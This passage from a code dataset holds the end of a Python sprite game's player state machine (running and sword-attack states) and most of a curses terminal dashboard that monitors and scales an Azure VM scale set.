RUN_SPEED_PPS\n# boy.height = 7\n# elif event == BOTTOM_UP:\n# boy.velocity_y += RUN_SPEED_PPS\n# boy.height = 6\n#\n# def exit(boy, event):\n# pass\n#\n# def do(boy):\n# boy.frame = (boy.frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 4\n#\n# def draw(boy):\n# if boy.dir_x == 0 and boy.dir_y == 0:\n# boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n# else:\n# boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n\n\nclass RunState: # 움직이는 상태\n\n def enter(boy, event):\n if event == RIGHT_DOWN:\n boy.velocity_x += RUN_SPEED_PPS\n boy.height = 10\n elif event == LEFT_DOWN:\n boy.velocity_x -= RUN_SPEED_PPS\n boy.height = 11\n elif event == TOP_DOWN:\n boy.velocity_y += RUN_SPEED_PPS\n boy.height = 8\n elif event == BOTTOM_DOWN:\n boy.velocity_y -= RUN_SPEED_PPS\n boy.height = 9\n elif event == RIGHT_UP:\n boy.velocity_x -= RUN_SPEED_PPS\n boy.height = 4\n elif event == LEFT_UP:\n boy.velocity_x += RUN_SPEED_PPS\n boy.height = 5\n elif event == TOP_UP:\n boy.velocity_y -= RUN_SPEED_PPS\n boy.height = 7\n elif event == BOTTOM_UP:\n boy.velocity_y += RUN_SPEED_PPS\n boy.height = 6\n\n\n boy.dir_x = int(boy.velocity_x)\n boy.dir_y = int(boy.velocity_y)\n\n def 
exit(boy, event):\n pass\n\n def do(boy):\n boy.frame = (boy.frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 6\n boy.x += boy.velocity_x * game_framework.frame_time\n boy.y += boy.velocity_y * game_framework.frame_time\n boy.x = clamp(50, boy.x, 1024-50)\n boy.y = clamp(50, boy.y, 768-50)\n\n def draw(boy):\n if boy.velocity_x > 0:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n elif boy.velocity_x < 0:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n else:\n if boy.velocity_y > 0 or boy.velocity_y < 0:\n if boy.dir_y > 0:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n else:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n else: # idle 상태\n boy.image.clip_draw((int(boy.frame) % 4) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n\nclass AttackState:\n\n def enter(boy, event):\n if event == Z_DOWN:\n boy.attack()\n if boy.dir_x == 1:\n boy.height = 1\n elif boy.dir_x == -1:\n boy.height = 2\n elif boy.dir_y == 1:\n boy.height = 0\n else:\n boy.height = 3\n else:\n boy.height = 6\n\n def get_bb(boy): # 방향에 따라 if문으로 범위 조절 지금은 아래밖에 못치니까 y값 변환\n return boy.x - 15, boy.y - 17, boy.x + 10, boy.y + 18\n\n def exit(boy, event):\n pass\n\n def do(boy):\n boy.frame = (boy.frame + FRAMES_PER_ACTION * ACTION_PER_TIME * game_framework.frame_time) % 3\n\n def draw(boy):\n # if boy.dir_x == 0 and boy.dir_y == 0:\n # boy.image.clip_draw(0, boy.height * 40, 31, 40, boy.x, boy.y)\n # elif boy.dir_x == 1:\n boy.image.clip_draw(int(boy.frame) * 31, boy.height * 40, 31, 40, boy.x, boy.y)\n\nnext_state_table = {\n\n # IdleState: {TOP_UP: RunState, BOTTOM_UP: RunState,\n # TOP_DOWN: RunState, BOTTOM_DOWN: RunState,\n # RIGHT_UP: RunState, LEFT_UP: RunState,\n # RIGHT_DOWN: RunState, LEFT_DOWN: RunState,\n # Z_DOWN: AttackState, Z_UP: IdleState\n # },\n\n RunState: {TOP_UP: RunState, BOTTOM_UP: RunState,\n TOP_DOWN: RunState, BOTTOM_DOWN: RunState,\n RIGHT_UP: RunState, LEFT_UP: RunState,\n RIGHT_DOWN: RunState, LEFT_DOWN: RunState,\n Z_DOWN: AttackState, Z_UP: AttackState\n },\n\n AttackState: {TOP_UP: RunState, BOTTOM_UP: RunState,\n TOP_DOWN: RunState, BOTTOM_DOWN: RunState,\n RIGHT_UP: RunState, LEFT_UP: RunState,\n RIGHT_DOWN: RunState, LEFT_DOWN: RunState,\n Z_DOWN: AttackState, Z_UP: RunState\n }\n}\n\nclass Boy:\n\n def __init__(self):\n self.x, self.y = 1024//2, 768//2\n self.image = load_image('boy_sprite.png')\n self.attack_sound = load_wav('attack_sword.wav')\n self.attack_sound.set_volume(32)\n self.font = load_font('ENCR10B.TTF', 12)\n self.dir_x = 0\n self.dir_y = 0\n self.velocity_x = 0\n self.velocity_y = 0\n self.frame = 0\n self.height = 6\n self.timer = 0\n self.hp = 10000\n self.event_que = []\n self.cur_state = RunState\n self.cur_state.enter(self, None)\n self.left = False\n self.right = False\n self.top = False\n self.bottom = False\n\n def attack(self):\n self.attack_sound.play()\n\n def change_state(self, state):\n # fill here\n pass\n\n\n def add_event(self, event):\n self.event_que.insert(0, event)\n\n def update(self):\n self.cur_state.do(self)\n if len(self.event_que) > 0:\n event = self.event_que.pop()\n self.cur_state.exit(self, event)\n self.cur_state = next_state_table[self.cur_state][event]\n self.cur_state.enter(self, event)\n # for slime in server.slimes:\n # if collision.collide(server.boy, slime):\n\n def draw(self):\n self.cur_state.draw(self)\n draw_rectangle(*self.get_bb())\n self.font.draw(self.x, self.y + 
50, '(Hp: %0.0f)' % self.hp, (255, 255, 0))\n\n def handle_event(self, event):\n if(event.type, event.key) in key_event_table:\n key_event = key_event_table[(event.type, event.key)]\n self.add_event((key_event))\n\n def get_bb(self):\n return self.x - 15, self.y - 17, self.x + 10, self.y + 18\n\n # def get_bb_attack(self):\n # if self.cur_state == AttackState:\n # return self.x - 20, self.y - 22, self.x + 20, self.y + 20\n # else:\n # return self.x - 15, self.y - 17, self.x + 10, self.y + 18","repo_name":"zzmyungjun/Project","sub_path":"boy.py","file_name":"boy.py","file_ext":"py","file_size_in_byte":8232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42755845668","text":"import sys\nimport time\nimport json\nimport azurerm\nimport threading\nimport platform\nimport logging\nimport requests\nfrom logtail import *\nfrom unicurses import *\nfrom windows import *\nfrom datacenters import *\n\n# Load Azure app defaults\ntry:\n\twith open('asciivmssdashboard.json') as configFile:\n\t\tconfigData = json.load(configFile)\nexcept FileNotFoundError:\n\tprint(\"Error: Expecting asciivmssdashboard.json in current folder\")\n\tsys.exit()\n\ntry:\n\ttenant_id = configData['tenantId']\n\tapp_id = configData['appId']\n\tapp_secret = configData['appSecret']\n\tsubscription_id = configData['subscriptionId']\n\t# this is the resource group, VM Scale Set to monitor..\n\trgname = configData['resourceGroup']\n\tvmssname = configData['vmssName']\n\tvmsku = configData['vmSku']\n\ttier = configData['tier']\n\tpurgeLog = configData['purgeLog']\n\tlogName = configData['logName']\n\tlogLevel = configData['logLevel']\n\tinterval = configData['interval']\n\tinsightsAppId = configData['insightsAppId']\n\tinsightsKey = configData['insightsKey']\n\tinsightsUrl = configData['insightsUrl']\n\tinsightsOneEnabled = configData['insightsOneEnabled']\n\tinsightsOneUrl = configData['insightsOneUrl']\n\tinsightsOneMetric = configData['insightsOneMetric']\n\tinsightsOneTitle = configData['insightsOneTitle']\n\tinsightsTwoEnabled = configData['insightsTwoEnabled']\n\tinsightsTwoUrl = configData['insightsTwoUrl']\n\tinsightsTwoMetric = configData['insightsTwoMetric']\n\tinsightsTwoTitle = configData['insightsTwoTitle']\n\tinsightsInterval = configData['insightsInterval']\n\tconfigFile.close()\nexcept:\n\tprint(\"Missing configuration parameter. 
You can disable some features, but the config option must be present.\")\n\tprint(\"Use the asciivmssdashboard.json.tmpl file as a template to fill in your custom values...\")\n\tconfigFile.close()\n\tsys.exit()\n\n#Region...\nregion=\"\"\n\n#Just a high number, so we can test and see if it was not updated yet...\ncapacity=999999\n#VM\nvm_selected = [999999, 999999];\ninsights_flag = 0;\n\n#Window VM\ncountery=0\nwindow_vm = []; panel_vm = []; instances_deployed = [];\nvm_details = \"\"; vm_nic = \"\";\npage = 1;\n\n#Flag to quit...\nquit = 0;\n\n#Remove old log file if requested (default behavior)...\nif (purgeLog.lower() == \"yes\"):\n\tif (os.path.isfile(logName)):\n\t\tos.remove(logName);\n\n#Basic Logging...\n#logging.basicConfig(format='%(asctime)s - %(levelname)s:%(message)s', datefmt='%H:%M:%S', level=logLevel, filename=logName)\nlogging.basicConfig(format='%(asctime)s - %(levelname)s:%(message)s', level=logLevel, filename=logName)\n\n#Exec command...\ndef exec_cmd(window, access_token, cap, cmd):\n\tglobal subscription_id, rgname, vmssname, vmsku, tier, vm_selected, window_vm, panel_vm, vm_details, vm_nic, page, insights_flag;\n\n\t#Return codes...\n\tiniterror = 2; syntaxerror = 3; capacityerror = 4;\n\texecsuccess = 0; execerror = 1;\n\n\t#Sanity check on capacity...\n\tif (cap == \"999999\"):\n\t\treturn initerror;\n\tif not (isinstance(cap, int)):\n\t\treturn initerror;\n\n\t#Syntax check...\n\tif (len(cmd.split()) != 4 and len(cmd.split()) != 3):\n\t\treturn syntaxerror;\n\n\tcounter = 0;\n\tfor c in cmd.split():\n\t\tif (counter == 0):\n\t\t\tif (c == \"add\" or c == \"del\" or c == \"rg\" or c == \"select\" or c == \"show\"):\n\t\t\t\top = c;\n\t\t\telse:\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 1 and op == \"show\" and c != \"page\"):\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 1 and c != \"vm\") and (op == \"add\" or op == \"del\" or op == \"select\"):\n\t\t\treturn syntaxerror;\n\t\tif (counter == 1 and op == \"rg\"):\n\t\t\trgname_new = c;\n\t\tif (counter == 2) and (op == \"add\" or op == \"del\" or op == \"select\" or op == \"show\"): \n\t\t\ttry:\n\t\t\t\ta = int(c) + 1;\n\t\t\t\tqtd = int(c);\n\t\t\texcept:\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 2 and op == \"select\"):\n\t\t\tz = 0; ifound = 0;\n\t\t\twhile (z < instances_deployed.__len__()):\n\t\t\t\tif (instances_deployed[z] == int(c)):\n\t\t\t\t\tifound = 1;\n\t\t\t\t\tbreak;\n\t\t\t\tz += 1;\n\t\t\tif (ifound):\n\t\t\t\tvm = int(c);\n\t\t\telse:\n\t\t\t\treturn execerror;\n\t\tif (counter == 2 and op == \"rg\" and c != \"vmss\"):\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 2 and op == \"show\"):\n\t\t\ttry:\n\t\t\t\ta = int(c) + 1;\n\t\t\t\tif (int(c) == page):\n\t\t\t\t\treturn execsuccess; \n\t\t\t\tif (int(c) > 1):\n\t\t\t\t\tb = ((window_vm.__len__() / (int(c) - 1)));\n\t\t\t\t\tif (b <= 100 or (int(c)) <= 0):\n\t\t\t\t\t\treturn syntaxerror;\n\t\t\t\t\telse:\n\t\t\t\t\t\tpage_new = int(c);\n\t\t\t\telif (int(c) == 1):\n\t\t\t\t\t\tpage_new = int(c);\n\t\t\t\telse:\n\t\t\t\t\t\treturn syntaxerror;\n\t\t\texcept:\n\t\t\t\treturn syntaxerror;\n\t\tif (counter == 3 and op == \"rg\"):\n\t\t\tvmssname_new = c;\n\t\tcounter += 1;\n\n\t#Execution...\n\tif (op == \"add\" or op == \"del\"):\n\t\tif (qtd > 99): \n\t\t\treturn capacityerror;\n\t\t#Scale-in or Scale-out...\n\t\tif (op == \"add\"):\n \t\t\tnewCapacity = cap + int(c);\n\t\telse:\n \t\t\tnewCapacity = cap - int(c);\n\t\t#Ok, everything seems fine, let's do it...\n\t\t#Change the VM scale set capacity by 'qtd' (can be positive 
or negative for scale-out/in)\n\t\t#The interface for scale_vmss changed from 7 to just 5 arguments...\n\t\t#scaleoutput = azurerm.scale_vmss(access_token, subscription_id, rgname, vmssname, vmsku, tier, newCapacity);\n\t\tscaleoutput = azurerm.scale_vmss(access_token, subscription_id, rgname, vmssname, newCapacity);\n\t\tif (scaleoutput.status_code == 200):\n\t\t\treturn execsuccess;\n\t\telse:\n\t\t\treturn execerror;\n\telif (op == \"select\"):\n\t\tvm_selected[1] = vm_selected[0];\n\t\tvm_selected[0] = vm;\n\t\tvm_details_old = vm_details; vm_nic_old = vm_nic;\n\t\tvm_details = azurerm.get_vmss_vm_instance_view(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t#vm_nic = azurerm.get_vmss_vm_nics(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t#if (len(vm_details) > 0 and len(vm_nic) > 0):\n\t\tif (len(vm_details) > 0):\n\t\t\treturn execsuccess;\n\t\telse:\n\t\t\tvm_details = vm_details_old;\n\t\t\tvm_nic = vm_nic_old;\n\t\t\tvm_selected[1] = 999998;\n\t\t\treturn execerror;\n\telif (op == \"show\"):\n\t\tunset_page();\n\t\tset_page(window, page_new);\n\t\treturn execsuccess;\n\telse:\n\t\t#Test to be sure the resource group and vmss provided do exist...\n\t\trgoutput = azurerm.get_vmss(access_token, subscription_id, rgname_new, vmssname_new);\n\t\ttry:\n\t\t\ttest = rgoutput['location'];\n\t\t\trgname = rgname_new; vmssname = vmssname_new;\n\t\t\t#Just a flag for us to know that we changed the vmss and need to deselect any VM...\n\t\t\tvm_selected[1] = 999998;\n\t\t\t#We need to clear the Insights graph too...\n\t\t\tinsights_flag = 1;\n\t\t\tpage = 1;\n\t\t\treturn execsuccess;\n\t\texcept:\n\t\t\treturn execerror;\n\ndef unset_page():\n\tglobal page, window_vm, panel_vm;\n\told_page = page;\n\n\tvmlimit = int(window_vm.__len__());\n\tblimit = int(int(old_page) * 100);\n\tb = (blimit - 100);\n\twhile (b < blimit and b < vmlimit):\n\t\thide_panel(panel_vm[b]);\n\t\tb += 1;\n\ndef set_page(window, page_new):\n\tglobal page, window_vm, panel_vm;\n\tpage = page_new;\n\tsnap_page = \"%02d\" % page_new;\n\n\tvmlimit = int(window_vm.__len__());\n\tblimit = int(int(page) * 100);\n\tb = (blimit - 100);\n\twhile (b < blimit and b < vmlimit):\n\t\tshow_panel(panel_vm[b]);\n\t\tb += 1;\n\twrite_str(window['virtualmachines'], 31, 45, snap_page);\n\tupdate_panels();\n\tdoupdate();\n\ndef fill_quota_info(window, quota):\n\twrite_str(window['usage'], 2, 23, quota['value'][0]['currentValue']);\n\twrite_str_color(window['usage'], 2, 29, quota['value'][0]['limit'], 7, 0);\n\tdraw_gauge(window['gaugeas'], quota['value'][0]['currentValue'], quota['value'][0]['limit']);\n\n\twrite_str(window['usage'], 3, 23, quota['value'][1]['currentValue']);\n\twrite_str_color(window['usage'], 3, 29, quota['value'][1]['limit'], 7, 0);\n\tdraw_gauge(window['gaugerc'], quota['value'][1]['currentValue'], quota['value'][1]['limit']);\n\n\twrite_str(window['usage'], 4, 23, quota['value'][2]['currentValue']);\n\twrite_str_color(window['usage'], 4, 29, quota['value'][2]['limit'], 7, 0);\n\tdraw_gauge(window['gaugevm'], quota['value'][2]['currentValue'], quota['value'][2]['limit']);\n\n\twrite_str(window['usage'], 5, 23, quota['value'][3]['currentValue']);\n\twrite_str_color(window['usage'], 5, 29, quota['value'][3]['limit'], 7, 0);\n\tdraw_gauge(window['gaugess'], quota['value'][3]['currentValue'], quota['value'][3]['limit']);\n\ndef fill_vmss_info(window, vmssget, net):\n\t(name, capacity, location, offer, sku, provisioningState, dns, ipaddr) = set_vmss_variables(vmssget, 
net);\n\n\twrite_str(window['vmss_info'], 2, 14, rgname.upper());\n\twrite_str(window['vmss_info'], 2, 48, vmssname.upper());\n\twrite_str(window['vmss_info'], 2, 76, tier.upper());\n\twrite_str(window['vmss_info'], 3, 37, location.upper());\n\twrite_str(window['vmss_info'], 3, 76, vmsku);\n\twrite_str(window['vmss_info'], 4, 79, capacity);\n\n\t#Sys info...\n\twrite_str(window['system'], 1, 22, offer);\n\twrite_str(window['system'], 2, 22, sku);\n\tcor=6;\n\tif (provisioningState == \"Updating\"): cor=7;\n\twrite_str_color(window['system'], 4, 22, provisioningState, cor, 0);\n\twrite_str(window['vmss_info'], 4, 14, dns);\n\twrite_str(window['vmss_info'], 3, 14, ipaddr);\n\ndef update_vm_footer(window, cur_page, tot_pages):\n\twrite_str(window['virtualmachines'], 31, 38, \" Page: \");\n\twrite_str(window['virtualmachines'], 31, 45, cur_page);\n\twrite_str(window['virtualmachines'], 31, 47, \"/\");\n\twrite_str(window['virtualmachines'], 31, 48, tot_pages);\n\twrite_str(window['virtualmachines'], 31, 50, \" \");\n\ndef fill_vm_details(window, instanceId, vmName, provisioningState):\n\tglobal vm_details; \n\twrite_str(window['vm'], 2, 17, instanceId);\n\twrite_str(window['vm'], 3, 17, vmName);\n\tcor=7;\n\tif (provisioningState == \"Succeeded\"): cor=6;\n\twrite_str_color(window['vm'], 4, 17, provisioningState, cor, 0);\n\tif (provisioningState == \"Succeeded\"):\n\t\tcdate = vm_details['statuses'][0]['time'];\n\t\tvmdate = cdate.split(\"T\")\n\t\tvmtime = vmdate[1].split(\".\")\n\t\twrite_str(window['vm'], 5, 17, vmdate[0]);\n\t\twrite_str(window['vm'], 6, 17, vmtime[0]);\n\t\tcor=7;\n\t\tif (vm_details['statuses'][1]['displayStatus'] == \"VM running\"): cor=6;\n\t\twrite_str_color(window['vm'], 7, 17, vm_details['statuses'][1]['displayStatus'], cor, 0);\n\t\twrite_str(window['vm'], 8, 17, vm_details['platformUpdateDomain']);\n\t\twrite_str(window['vm'], 9, 17, vm_details['platformFaultDomain']);\n\t\twrite_str(window['vm'], 11, 12, vm_nic['value'][0]['name']);\n\t\twrite_str(window['vm'], 12, 12, vm_nic['value'][0]['properties']['macAddress']);\n\t\twrite_str(window['vm'], 13, 12, vm_nic['value'][0]['properties']['ipConfigurations'][0]['properties']['privateIPAddress']);\n\t\twrite_str(window['vm'], 14, 12, vm_nic['value'][0]['properties']['ipConfigurations'][0]['properties']['primary']);\n\t\tif (vm_details['vmAgent']['statuses'][0]['message'] == \"Guest Agent is running\"): \n\t\t\tcor=6;\n\t\t\tagentstatus = \"Agent is running\";\n\t\telif (vm_details['vmAgent']['statuses'][0]['message'] == \"VM Agent is unresponsive.\"):\n\t\t\tcor=7;\n\t\t\tagentstatus = \"Agent is unresponsive\";\n\t\telse:\n\t\t\tcor=7;\n\t\t\tagentstatus = vm_details['vmAgent']['statuses'][0]['message'];\n\t\twrite_str(window['vm'], 16, 11, vm_details['vmAgent']['vmAgentVersion']);\n\t\twrite_str(window['vm'], 17, 11, vm_details['vmAgent']['statuses'][0]['displayStatus']);\n\t\twrite_str_color(window['vm'], 18, 11, agentstatus, cor, 0);\n\ndef deselect_vm(window, panel, instanceId, counter):\n\tglobal vm_selected;\n\n\tvmsel = 0;\n\tif (vm_selected[1] == int(instanceId) and vm_selected[1] != vm_selected[0]):\n\t\tbox(window[int(counter - 1)]);\n\tif (vm_selected[0] == int(instanceId) and vm_selected[1] != 999998 and vm_selected[0] != vm_selected[1]):\n\t\tvmsel = 1;\n\t\tshow_panel(panel['vm']);\n\tif (vm_selected[0] == int(instanceId) and vm_selected[1] == 999998):\n\t\tvmsel = 0;\n\t\tvm_selected = [999999, 999999];\n\treturn (vmsel);\n\ndef set_vmss_variables(vmssget, net):\n\tglobal vmsku, tier;\n\n\tname = 
vmssget['name']\n\tcapacity = vmssget['sku']['capacity']\n\tlocation = vmssget['location'];\n\ttier = vmssget['sku']['tier']\n\tvmsku = vmssget['sku']['name']\n\toffer = vmssget['properties']['virtualMachineProfile']['storageProfile']['imageReference']['offer']\n\tsku = vmssget['properties']['virtualMachineProfile']['storageProfile']['imageReference']['sku']\n\tprovisioningState = vmssget['properties']['provisioningState']\n\tdns = net['value'][0]['properties']['dnsSettings']['fqdn'];\n\tipaddr = net['value'][0]['properties']['ipAddress'];\n\treturn (name, capacity, location, offer, sku, provisioningState, dns, ipaddr);\n\n\n# thread to loop around monitoring the VM Scale Set state and its VMs\n# sleep between loops sets the update frequency\ndef get_vmss_properties(access_token, run_event, window_information, panel_information, window_continents, panel_continents):\n\tglobal vmssProperties, vmssVmProperties, countery, capacity, region, tier, vmsku, vm_selected, window_vm, panel_vm, instances_deployed, vm_details, vm_nic, page;\n\n\tROOM = 5; DEPLOYED = 0;\n\n\t#VM's destination...\n\tdestx = 22; desty = 4; XS =50; YS = 4; init_coords = (XS, YS);\n\twindow_dc = 0;\n\n\t#Our window_information arrays...\n\tpanel_vm = []; window_vm = [];\n\n\t#Our thread loop...\n\twhile run_event.is_set():\n\t\ttry:\n\t\t\t#Timestamp...\n\t\t\tourtime = time.strftime(\"%H:%M:%S\");\n\t\t\twrite_str(window_information['status'], 1, 13, ourtime);\n\n\t\t\t#Clean Forms...\n\t\t\tclean_forms(window_information);\n\n\t\t\t#Get VMSS details\n\t\t\tvmssget = azurerm.get_vmss(access_token, subscription_id, rgname, vmssname);\n\n\t\t\t# Get public ip address for RG (First IP) - modify this if your RG has multiple ips\n\t\t\tnet = azurerm.list_public_ips(access_token, subscription_id, rgname);\n\n\t\t\t#Clean Info and Sys Windows...\n\t\t\tclean_infoandsys(window_information);\n\n\t\t\t#Fill the information...\n\t\t\tfill_vmss_info(window_information, vmssget, net);\n\n\t\t\t#Set VMSS variables...\n\t\t\t(name, capacity, location, offer, sku, provisioningState, dns, ipaddr) = set_vmss_variables(vmssget, net);\n\n\t\t\t#Set the current and old location...\n\t\t\told_location = region;\n\t\t\tif (old_location != \"\"):\n\t\t\t\tcontinent_old_location = get_continent_dc(old_location);\n\n\t\t\t#New\n\t\t\tregion = location;\n\t\t\tcontinent_location = get_continent_dc(location);\n\n\t\t\t#Quota...\n\t\t\tquota = azurerm.get_compute_usage(access_token, subscription_id, location);\n\t\t\tfill_quota_info(window_information, quota);\n\n\t\t\t#Mark Datacenter where VMSS is deployed...\n\t\t\tif (old_location != \"\"):\n\t\t\t\tif (old_location != location):\n\t\t\t\t\t#Now switch the datacenter mark on map...\n\t\t\t\t\tnew_window_dc = mark_vmss_dc(continent_old_location, window_continents[continent_old_location], old_location, window_continents[continent_location], location, window_dc);\n\t\t\t\t\twindow_dc = new_window_dc;\n\t\t\telse:\n\t\t\t\tnew_window_dc = mark_vmss_dc(continent_location, window_continents[continent_location], location, window_continents[continent_location], location, window_dc);\n\t\t\t\twindow_dc = new_window_dc;\n\n\t\t\t#Our arrays...\n\t\t\tvmssProperties = [name, capacity, location, rgname, offer, sku, provisioningState, dns, ipaddr];\n\t\t\tvmssvms = azurerm.list_vmss_vms(access_token, subscription_id, rgname, vmssname);\n\t\t\tvmssVmProperties = [];\n\n\t\t\t#All VMs are created in the following coordinates...\n\t\t\tqtd = vmssvms['value'].__len__();\n\t\t\tfactor = (vmssvms['value'].__len__() 
/ 100);\n\n\t\t\twrite_str(window_information['system'], 3, 22, qtd);\n\n\t\t\tstep = qtd / 10;\n\t\t\tif (step < 1): step = 1;\t\n\n\t\t\t#We take more time on our VM effects depending on how many VMs we are talking about...\n\t\t\tif (qtd < 10): ts = 0.01;\n\t\t\telif (qtd < 25): ts = 0.004;\n\t\t\telif (qtd < 50): ts = 0.0008;\n\t\t\telif (qtd < 100): ts = 0.0004;\n\t\t\telse: ts = 0;\n\n\t\t\tcounter = 1; counter_page = 0; nr_pages = 1;\n\n\t\t\tsnap_page = page;\n\t\t\tpage_top = (snap_page * 100);\n\t\t\tpage_base = ((snap_page - 1) * 100);\n\n\t\t\tif (vm_selected[1] == 999998):\n\t\t\t\t#Clean VM Info...\n\t\t\t\tclean_vm(window_information);\n\t\t\t#Loop each VM...\n\t\t\tfor vm in vmssvms['value']:\n\t\t\t\tinstanceId = vm['instanceId'];\n\t\t\t\twrite_str(window_information['monitor'], 1, 30, instanceId);\n\t\t\t\twrefresh(window_information['monitor']);\n\t\t\t\tvmsel = 0;\n\t\t\t\tvmName = vm['name'];\n\t\t\t\tprovisioningState = vm['properties']['provisioningState'];\n\t\t\t\tvmssVmProperties.append([instanceId, vmName, provisioningState]);\n\t\t\t\tif (counter > DEPLOYED):\n\t\t\t\t\twindow_vm.append(DEPLOYED); panel_vm.append(DEPLOYED); instances_deployed.append(DEPLOYED);\n\t\t\t\t\tinstances_deployed[DEPLOYED] = int(instanceId);\n\t\t\t\t\t#Prepare the place for the VM icon...\n\t\t\t\t\tif countery < 10:\n\t\t\t\t\t\tcountery += 1;\n\t\t\t\t\telse:\n\t\t\t\t\t\tdestx += 3; desty = 4; countery = 1;\n\t\t\t\t\tif (counter_page > 99):\n\t\t\t\t\t\tdestx = 22; counter_page = 0; nr_pages += 1;\n\t\t\t\t\t\tcur_page = \"%02d\" % snap_page;\n\t\t\t\t\t\ttot_pages = \"%02d\" % nr_pages;\n\t\t\t\t\t\tupdate_vm_footer(window_information, cur_page, tot_pages);\n\t\t\t\t\telse:\n\t\t\t\t\t\tcounter_page += 1;\n\t\t\t\t\twindow_vm[DEPLOYED] = create_window(3, 5, init_coords[0], init_coords[1]);\n\t\t\t\t\tpanel_vm[DEPLOYED] = new_panel(window_vm[DEPLOYED]);\n\t\t\t\t\t#Show only VM's that are on the visible window...\n\t\t\t\t\tif (page_top > DEPLOYED and DEPLOYED >= page_base):\n\t\t\t\t\t\tshow_panel(panel_vm[DEPLOYED]);\n\t\t\t\t\telse:\n\t\t\t\t\t\thide_panel(panel_vm[DEPLOYED]);\n\t\t\t\t\tbox(window_vm[DEPLOYED]);\n\t\t\t\t\t#Creation of the VM icon, in this flow we never have a VM selected...\n\t\t\t\t\tdraw_vm(int(instanceId), window_vm[DEPLOYED], provisioningState, vmsel);\n\t\t\t\t\tvm_animation(panel_vm[DEPLOYED], init_coords, destx, desty, 1, ts);\n\t\t\t\t\tdesty += ROOM;\n\t\t\t\t\tDEPLOYED += 1;\n\t\t\t\telse:\n\t\t\t\t\tinstances_deployed[counter - 1] = int(instanceId);\n\t\t\t\t\t#Remove the old mark...\n\t\t\t\t\tvmsel = deselect_vm(window_vm, panel_information, instanceId, counter);\n\t\t\t\t\t#Show only VM's that are on the visible window...\n\t\t\t\t\tif (page_top > (counter - 1) and (counter - 1) >= page_base):\n\t\t\t\t\t\tshow_panel(panel_vm[counter -1]);\n\t\t\t\t\telse:\n\t\t\t\t\t\thide_panel(panel_vm[counter -1]);\n\t\t\t\t\t#Creation of the VM icon...\n\t\t\t\t\tdraw_vm(int(instanceId), window_vm[counter - 1], provisioningState, vmsel);\n\t\t\t\t\t#If a VM is selected, fill the details...\n\t\t\t\t\tif (vm_selected[0] == int(instanceId) and vm_selected[1] != 999998):\n\t\t\t\t\t\tvm_details = azurerm.get_vmss_vm_instance_view(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t\t\t\t\tvm_nic = azurerm.get_vmss_vm_nics(access_token, subscription_id, rgname, vmssname, vm_selected[0]);\n\t\t\t\t\t\tclean_vm(window_information);\n\t\t\t\t\t\tif (vm_details != \"\" and vm_nic != \"\"):\n\t\t\t\t\t\t\tfill_vm_details(window_information, 
instanceId, vmName, provisioningState);\n\t\t\t\tupdate_panels();\n\t\t\t\tdoupdate();\n\t\t\t\tcounter += 1;\n\t\t\t\tdo_update_bar(window_information['status'], step, 0);\n\t\t\t\tstep += step;\n\t\t\t#Last mile...\n\t\t\twrite_str(window_information['monitor'], 1, 30, \"Done.\");\n\t\t\tdo_update_bar(window_information['status'], step, 1);\n\n\t\t\t#Remove destroyed VMs...\n\t\t\tcounter_page = 0;\n\t\t\tif (DEPLOYED >= counter):\n\t\t\t\ttime.sleep(0.5);\n\t\t\t\twrite_str_color(window_information['monitor'], 1, 30, \"Removing VM's...\", 7, 0);\n\t\t\t\twrefresh(window_information['monitor']);\n\t\t\t\ttime.sleep(1);\n\t\t\t\tclean_monitor_form(window_information);\n\t\n\t\t\twhile (DEPLOYED >= counter):\n\t\t\t\twrite_str(window_information['monitor'], 1, 30, DEPLOYED);\n\t\t\t\tlastvm = window_vm.__len__() - 1;\t\n\t\t\t\tvm_coords = getbegyx(window_vm[lastvm]);\n\t\t\t\tvm_animation(panel_vm[lastvm], vm_coords, init_coords[0], init_coords[1], 0, ts);\n\t\t\t\tif (countery > 0):\n\t\t\t\t\tdesty -= ROOM; countery -= 1;\n\t\t\t\telif (destx > 22):\n\t\t\t\t\tdestx -= 3; desty = 49; countery = 9;\n\t\t\t\tif (counter_page > 99):\n\t\t\t\t\tdestx = 52;\n\t\t\t\t\tcounter_page = 0;\n\t\t\t\t\tnr_pages -= 1;\n\t\t\t\t\ttot_pages = \"%02d\" % nr_pages;\n\t\t\t\t\tcur_page = \"%02d\" % page;\n\t\t\t\t\tupdate_vm_footer(window_information, cur_page, tot_pages);\n\t\t\t\telse:\n\t\t\t\t\tcounter_page += 1;\n\t\t\t\t\n\t\t\t\t#Clean VM Info...\n\t\t\t\tif (vm_selected[0] == instances_deployed[lastvm]):\n\t\t\t\t\tclean_vm(window_information);\n\t\t\t\t#Free up some memory...\n\t\t\t\tdel_panel(panel_vm[lastvm]); delwin(window_vm[lastvm]);\n\t\t\t\twobj = panel_vm[lastvm]; panel_vm.remove(wobj);\n\t\t\t\twobj = window_vm[lastvm]; window_vm.remove(wobj);\n\t\t\t\twobj = instances_deployed[lastvm]; instances_deployed.remove(wobj);\n\t\t\t\tDEPLOYED -= 1;\n\t\t\t\tupdate_panels();\n\t\t\t\tdoupdate();\n\t\t\twrite_str(window_information['monitor'], 1, 30, \"Done.\");\n\t\t\tourtime = time.strftime(\"%H:%M:%S\");\n\t\t\tdo_update_bar(window_information['status'], step, 1);\n\t\t\twrite_str(window_information['status'], 1, 13, ourtime);\n\t\t\twrite_str_color(window_information['status'], 1, 22, \" OK 